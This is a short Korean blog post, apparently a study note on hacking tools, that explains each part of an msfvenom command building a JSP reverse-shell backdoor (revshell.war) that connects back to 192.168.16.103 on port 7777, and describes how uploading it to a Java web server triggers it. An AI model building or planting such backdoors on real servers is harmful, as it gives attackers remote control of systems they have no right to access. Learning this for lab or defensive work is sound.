해킹 도구

[9월 15일] Msfvenom을 사용하여 Reverse Shell 만들기

ljm 2025. 9. 15. 14:27

 

 

  • msfvenom: 리버스쉘을 만드는 도구입니다.  이 도구는 원하는 모양과 기능을 가진 백도어를 만들어 줍니다.
  • -p java/jsp_shell_reverse_tcp: 백도어의 종류를 정하는 부분입니다.
    • java/jsp: "이 백도어는 자바 웹사이트에 심을 거야" 라고 지정하는 것입니다.
    • shell_reverse_tcp: "백도어가 심어진 컴퓨터가 나에게 거꾸로 연락을 하도록 만들어줘"라는 기능입니다.
  • LHOST=192.168.16.103 LPORT=7777: 백도어가 연락할 주소를 지정하는 부분입니다.
    • LHOST=192.168.16.103: "백도어는 192.168.16.103 이 주소로 연락해야 해"
    • LPORT=7777: "연락할 때 포트 번호는 7777번을 사용해야 해"
  • -f war -o revshell.war: 백도어를 최종적으로 저장하는 부분입니다.
    • -f war: "백도어를 .war 파일 형태로 만들어줘"
    • -o revshell.war: "만들어진 파일의 이름은 **revshell.war**로 저장해"

결론적으로, 이 명령어는 "자바 웹 서버에 심을 수 있는 백도어 파일을 만들어서, 그 백도어가 나(192.168.16.103)한테 7777번 포트로 비밀 통신을 연결하게 해줘" 라는 뜻입니다.

이렇게 만들어진 revshell.war 파일을 웹 서버에 올리면, 서버는 이 파일을 정상적인 웹 애플리케이션으로 인식하고 실행하게 되면서 백도어가 작동하는 것입니다.